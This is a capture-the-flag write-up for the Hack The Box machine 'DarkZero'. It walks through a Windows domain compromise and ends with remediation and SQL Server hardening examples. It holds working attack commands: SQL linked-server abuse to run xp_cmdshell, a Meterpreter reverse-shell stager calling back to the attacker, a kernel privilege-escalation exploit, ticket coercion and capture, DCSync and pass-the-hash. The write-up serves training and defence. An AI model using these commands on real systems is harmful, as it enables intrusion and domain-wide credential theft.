HTB Season 8 · WEB · Hard

DarkZero

Category
WEB
OS
Windows

Reconnaissance

Target Details

Nmap Results

nmap -p 1-65535 -T4 -A -v 10.10.11.89

Open Ports (DC01):

SMB and Host Enumeration

nxc smb 10.10.11.89 -u 'john.w' -p 'RFulUtONCOL!' --generate-hosts-file /etc/hosts
smbmap -H 10.10.11.89 -d 'darkzero.htb' -u 'john.w' -p 'RFulUtONCOL!'

Only default shares were present. SMB and BloodHound enumeration did not provide useful results.

DNS Enumeration

dig @DC01.darkzero.htb ANY darkzero.htb

Findings:


Initial Access

MSSQL Access and Linked Servers

Connected to MSSQL using the provided credentials:

mssqlclient.py 'darkzero.htb/john.w:RFulUtONCOL!@10.10.11.89' -windows-auth

Attempt to enable xp_cmdshell on DC01 failed due to insufficient privileges:

enable_xp_cmdshell

Enumerated linked servers:

enum_links

Linked Servers:

The link to DC02.darkzero.ext maps the local login darkzero\john.w to the remote login dc01_sql_svc. That remote login is allowed to reconfigure DC02 (sp_configure needs ALTER SETTINGS, which sysadmin and serveradmin hold), so the link crosses a privilege boundary even though john.w is unprivileged on DC01.

Switched to the linked server (every following command now runs on DC02 as dc01_sql_svc) and enabled xp_cmdshell there successfully:

use_link "DC02.darkzero.ext"
enable_xp_cmdshell
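What enum_links and use_link drive on the server side, as an added T-SQL example written for this page (not the writeup's own commands). It is meant to be run as darkzero\john.w on DC01; the linked server name and the remote login come from the page, while the column selection and the OPENQUERY / EXEC ... AT form are the example's own choices:

```sql
-- Added example: enumerate linked servers and their login mappings the way
-- mssqlclient's enum_links does, then go through the link like use_link.
-- Run as darkzero\john.w on DC01. Linked server name is from the writeup.

-- 1. Which links exist, can they run RPC (needed for EXEC ... AT), and which
--    local login is mapped to which remote login?
--    local_principal_id = 0 is the catch-all mapping that applies to every
--    local login without an explicit entry of its own.
SELECT s.name,
       s.data_source,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       COALESCE(p.name, N'<all logins>') AS local_login,
       ll.remote_name,
       ll.uses_self_credential
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
       ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS p
       ON p.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 2. Compare privilege on each side of the link. Locally john.w is not
--    sysadmin (enable_xp_cmdshell failed on DC01); OPENQUERY runs the inner
--    statement on DC02 as the mapped login, dc01_sql_svc.
SELECT SYSTEM_USER AS local_login,
       IS_SRVROLEMEMBER('sysadmin') AS local_sysadmin;

SELECT *
FROM OPENQUERY([DC02.darkzero.ext],
     'SELECT SYSTEM_USER AS remote_login,
             IS_SRVROLEMEMBER(''sysadmin'') AS remote_sysadmin');

-- 3. If remote_sysadmin = 1 and is_rpc_out_enabled = 1, reconfigure the
--    remote instance. sp_configure needs ALTER SETTINGS on DC02, not on DC01.
EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;')
     AT [DC02.darkzero.ext];
EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;')
     AT [DC02.darkzero.ext];

-- 4. Command execution on DC02 in the context of its SQL Server service.
EXEC ('EXEC master..xp_cmdshell ''whoami''') AT [DC02.darkzero.ext];
```

use_link in mssqlclient wraps steps 3 and 4: each later command is shipped as EXEC (...) AT [link]. If step 1 shows is_rpc_out_enabled = 0, EXEC ... AT fails and only OPENQUERY (reads) works through the link.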

Meterpreter via MSSQL

Prepared a payload using Metasploit web_delivery:

msfconsole -q -x "use exploit/multi/script/web_delivery ; set payload windows/x64/meterpreter/reverse_tcp ; set LHOST tun0 ; set LPORT 443 ; set target 2 ; exploit -j"

Ran the Base64-encoded PowerShell stager printed by web_delivery through xp_cmdshell on DC02 (still inside use_link):

xp_cmdshell "powershell.exe -nop -w hidden -e <base64_payload>"

Result: Meterpreter session as darkzero-ext\svc_sql on 172.16.20.2 (DC02 subnet).


Privilege Escalation - User

Local Exploit: CVE-2024-30088

Ran local_exploit_suggester against the session, then the module for CVE-2024-30088 (a race condition in the Windows kernel, so it can take several attempts to land; AutoCheck false skips the module's pre-check and goes straight to the attempt). Repeated the run until it succeeded:

use multi/recon/local_exploit_suggester
set session 1
run

use exploit/windows/local/cve_2024_30088_authz_basep
set payload windows/x64/meterpreter_reverse_tcp
set session 1
set lhost tun0
set AutoCheck false
run

Result: NT AUTHORITY\SYSTEM shell on 172.16.20.2.

User Flag (DC02)

type C:\Users\Administrator\Desktop\user.txt

Privilege Escalation - Root

Kerberos Ticket Collection with Rubeus

Uploaded Rubeus to DC02 (the host with the SYSTEM shell) and ran it in monitor mode, which prints every new TGT that appears in LSASS, including tickets forwarded to DC02 through unconstrained delegation:

cd %temp%
C:\Windows\Temp\Rubeus.exe monitor /interval:1 /nowrap

Forced DC01 to authenticate to DC02 by asking SQL Server on DC01 to list a UNC path with xp_dirtree. The SMB connection is made by the SQL Server service, which here runs in the machine context DC01$. DC02 is a domain controller and therefore trusted for unconstrained delegation by default, so DC01$ includes a forwarded copy of its TGT in that authentication and the ticket ends up in LSASS on DC02, where Rubeus picks it up:

impacket-mssqlclient 'darkzero.htb/john.w:RFulUtONCOL!@DC01.darkzero.htb' -windows-auth
xp_dirtree \\DC02.darkzero.ext\sfsdafasd
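A check worth doing before the coercion, as an added example that is not part of the writeup: whose ticket will DC02 receive? That depends on the identity SQL Server on DC01 runs as. It assumes john.w holds VIEW SERVER STATE (required for the DMV); the hostnames and share name are the page's:

```sql
-- Added example: find out whose ticket a UNC coercion will hand over.
-- xp_dirtree makes the SQL Server *service* open the path, so the forwarded
-- TGT belongs to that service identity, not to the login that called it.
-- Needs VIEW SERVER STATE (assumption: john.w has it).
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server (%';
-- A service_account of NT AUTHORITY\SYSTEM or a virtual account such as
-- NT Service\MSSQLSERVER authenticates on the network as the computer
-- account (DC01$), which is the ticket the writeup ends up with. A domain
-- user or gMSA would yield that account's TGT instead.

-- The coercion itself: the share does not need to exist, because the SMB
-- authentication happens before the server answers about the path. Any
-- login allowed to EXECUTE xp_dirtree can trigger it, which is why the
-- low-privileged john.w was enough.
EXEC master..xp_dirtree N'\\DC02.darkzero.ext\sfsdafasd', 1, 1;
```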

Rubeus printed the DC01$ TGT as a base64 blob (/nowrap keeps it on one line). Saved it, decoded it to a .kirbi, and converted it to a ccache for Impacket:

base64 -d ticket.bs4.kirbi > ticket.kirbi
ticketConverter.py ticket.kirbi dc01_admin.ccache
export KRB5CCNAME=dc01_admin.ccache
klist

With the DC01$ TGT in KRB5CCNAME, ran secretsdump against DC01. A domain controller's machine account holds the replication rights DCSync needs, so this pulls every NT hash in the domain over Kerberos:

impacket-secretsdump -k -no-pass 'darkzero.htb/DC01$@DC01.darkzero.htb'

Root Flag (DC01)

Passed the Administrator NT hash from the dump to Evil-WinRM (pass-the-hash over WinRM):

evil-winrm -i 10.10.11.89 -u administrator -H 5917507bdf2ef2c2b0a869a1cba40726
type C:\Users\Administrator\Desktop\root.txt

Key Takeaways

  1. Linked SQL servers can silently grant higher privileges and enable remote command execution.
  2. Split-horizon DNS/multihoming can hide services on internal networks and enable lateral movement.
  3. xp_cmdshell is a high-risk feature that enables OS command execution from SQL Server.
  4. Kernel exploits like CVE-2024-30088 can bridge service-level access to SYSTEM.
  5. A UNC coercion primitive (xp_dirtree) plus unconstrained delegation on the receiving DC turns a low-privileged SQL login into a domain controller's TGT; Rubeus monitor captures it and ticketConverter/secretsdump finish the pass-the-ticket workflow.

Tools Used

  • nmap, NetExec (nxc), smbmap, dig, BloodHound (enumeration)
  • Impacket: mssqlclient, ticketConverter, secretsdump
  • Metasploit: web_delivery, local_exploit_suggester, cve_2024_30088_authz_basep
  • Rubeus (monitor mode)
  • Evil-WinRM

Flags

User Flag: Retrieved on DC02 (C:\Users\Administrator\Desktop\user.txt)
Root Flag: Retrieved on DC01 (C:\Users\Administrator\Desktop\root.txt)


Remediation Recommendations

Critical Severity

  1. Disable or Restrict xp_cmdshell

    • Issue: SQL Server allowed OS command execution on a linked server.
    • Impact: Remote code execution from database context and lateral movement.
    • Remediation:
      • Disable xp_cmdshell and use least-privilege SQL roles.
      • Enforce strict separation of linked server credentials.
      • Monitor and alert on any xp_cmdshell use.
  2. Harden Linked SQL Server Trusts

    • Issue: The link from DC01 to DC02 mapped the low-privileged login darkzero\john.w to the remote login dc01_sql_svc, which could reconfigure DC02, and RPC Out was enabled, so EXEC ... AT carried sp_configure and xp_cmdshell across.
    • Impact: Privilege escalation across SQL hosts; a foothold on one instance becomes command execution on the other.
    • Remediation:
      • Remove linked servers that are not needed; for the rest, drop the catch-all login mapping and map only named logins to a remote login holding the minimum database roles, never sysadmin or serveradmin.
      • Disable RPC Out (and Data Access where only one direction is needed) on links that do not require remote procedure execution.
      • Audit sys.servers and sys.linked_logins periodically and alert when a link gains a sysadmin-level remote login.
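The two Critical items as T-SQL, added here as an example rather than taken from the writeup. Run it as sysadmin on DC01 (and the xp_cmdshell part on DC02 as well); the server and login names are from the page, while the remote login dc02_link_ro, the password placeholder and the session name xp_watch are hypothetical:

```sql
-- Added example: hardening for Critical 1 and 2. Names from the writeup;
-- dc02_link_ro, the password placeholder and xp_watch are hypothetical.

-- Critical 1: turn xp_cmdshell off and hide advanced options again.
-- Run on both instances. A sysadmin can switch it back on, so the real
-- fix is the mapping change below, which keeps sysadmin off the link.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;

-- Critical 2, on DC01: remove the mapping that turned john.w into a
-- privileged remote login, and the catch-all mapping (@locallogin = NULL)
-- that would silently cover every other login.
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'DC02.darkzero.ext',
                           @locallogin = N'darkzero\john.w';
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'DC02.darkzero.ext',
                           @locallogin = NULL;

-- Re-add only the login that needs the link, mapped to a SQL login on DC02
-- that holds nothing beyond the database roles the application needs.
EXEC sp_addlinkedsrvlogin @rmtsrvname  = N'DC02.darkzero.ext',
                          @useself     = 'FALSE',
                          @locallogin  = N'darkzero\john.w',
                          @rmtuser     = N'dc02_link_ro',
                          @rmtpassword = N'<set from a vault, not a script>';

-- EXEC ... AT is what carried sp_configure across. If the link is only
-- read through OPENQUERY, turn RPC off entirely.
EXEC sp_serveroption @server   = N'DC02.darkzero.ext',
                     @optname  = 'rpc out',
                     @optvalue = 'false';

-- Verify: no catch-all (local_principal_id 0), expected remote_name,
-- is_rpc_out_enabled = 0.
SELECT s.name, s.is_rpc_out_enabled,
       ll.local_principal_id, ll.remote_name, ll.uses_self_credential
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.name = N'DC02.darkzero.ext';

-- Monitoring for Critical 1: an Extended Events session that records every
-- batch or RPC mentioning xp_cmdshell or xp_dirtree, with who and from
-- where. Ship the .xel file to the SIEM and alert on any row.
CREATE EVENT SESSION [xp_watch] ON SERVER
ADD EVENT sqlserver.sql_statement_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname,
            sqlserver.client_app_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_dirtree%')),
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname,
            sqlserver.client_app_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_dirtree%'))
ADD TARGET package0.event_file (SET filename = N'xp_watch.xel', max_file_size = 50)
WITH (STARTUP_STATE = ON);
ALTER EVENT SESSION [xp_watch] ON SERVER STATE = START;
```

The session catches both the direct call (xp_cmdshell "powershell ...") and the EXEC ... AT form, since the remote side logs the statement it receives; pair it with the verification query above in a scheduled job so a re-added mapping or re-enabled RPC Out is noticed.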

High Severity

  1. Patch Kernel Vulnerabilities (CVE-2024-30088)

    • Issue: Local privilege escalation to SYSTEM.
    • Impact: Full system compromise from service access.
    • Remediation:
      • Apply the latest Windows security updates.
      • Enforce EDR rules to detect privilege escalation behaviors.
  2. Prevent Coerced Authentication from SQL Server

    • Issue: A low-privileged SQL login could make DC01's SQL Server service, running in the DC01$ machine context, authenticate to an attacker-chosen host (xp_dirtree). The receiving host, DC02, is a domain controller and so trusted for unconstrained delegation by default, which let DC01$'s forwarded TGT be captured and reused.
    • Impact: Pass-the-ticket as a domain controller, DCSync, full domain compromise.
    • Remediation:
      • Do not run SQL Server on domain controllers or as LocalSystem/virtual account; use a dedicated low-privilege service account (gMSA) so a coerced authentication yields that account's ticket rather than DC01$.
      • Revoke EXECUTE on xp_dirtree, xp_fileexist and xp_subdirs from public; they are coercion primitives, not user features.
      • Enforce SMB signing and block outbound SMB from SQL hosts except to known file servers.
      • Monitor for TGTs appearing on unconstrained-delegation hosts for accounts that never log on there, and for Rubeus-like behaviour (LSASS access, repeated ticket reads).

Medium Severity

  1. Reduce Service Exposure on Domain Controllers

    • Issue: DC01 exposed MSSQL, WinRM, and multiple RPC endpoints.
    • Impact: Increased attack surface for lateral movement.
    • Remediation:
      • Remove non-essential services from DCs.
      • Segment management services onto admin-only networks.
  2. Split-Horizon DNS Visibility

    • Issue: Dual IPs and internal-only services complicate monitoring.
    • Impact: Hidden interfaces aid lateral movement.
    • Remediation:
      • Document multihomed DCs and apply firewall rules per interface.
      • Log and alert on internal-only service access.